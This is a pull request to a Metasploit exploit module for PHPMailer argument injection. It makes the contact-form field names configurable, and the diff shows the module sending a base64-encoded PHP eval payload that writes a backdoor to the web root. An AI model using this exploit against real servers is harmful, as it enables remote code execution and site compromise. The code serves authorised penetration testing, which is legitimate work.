### PR TITLE
Update on phpmailer_arg_injection.rb

### DIFF
--- a/modules/exploits/multi/http/phpmailer_arg_injection.rb
+++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -60,7 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
     register_advanced_options(
       [
-        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
+        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300]),
+        OptString.new('NAME_FIELD', [true, 'Name of the element for the Name field', 'name']),
+        OptString.new('EMAIL_FIELD', [true, 'Name of the element for the Email field', 'email']),
+        OptString.new('MESSAGE_FIELD', [true, 'Name of the element for the Message field', 'message'])
       ])
   end
 
@@ -98,6 +101,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    name_field = datastore['NAME_FIELD']
+    email_field = datastore['EMAIL_FIELD']
+    message_field = datastore['MESSAGE_FIELD']
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
@@ -111,9 +117,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part('submit', nil, nil, 'form-data; name="action"')
-    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
-    data.add_part(email, nil, nil, 'form-data; name="email"')
-    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
+    data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
 
     print_status("Writing the backdoor to #{payload_file_path}")
     res = send_request_cgi(


### PR DESCRIPTION
Added Advanced options to change the name of the fields for the name, email, and message objects.  Set the default to the previous hard coded value.

No changes to the functionality of the code just adding the ability for users to modify values

## Verification

- [x] Start `msfconsole`
- [x] `use exploits/multi/http/phpmailer_arg_injection`
- [x] `set NAME_FIELD different_name`

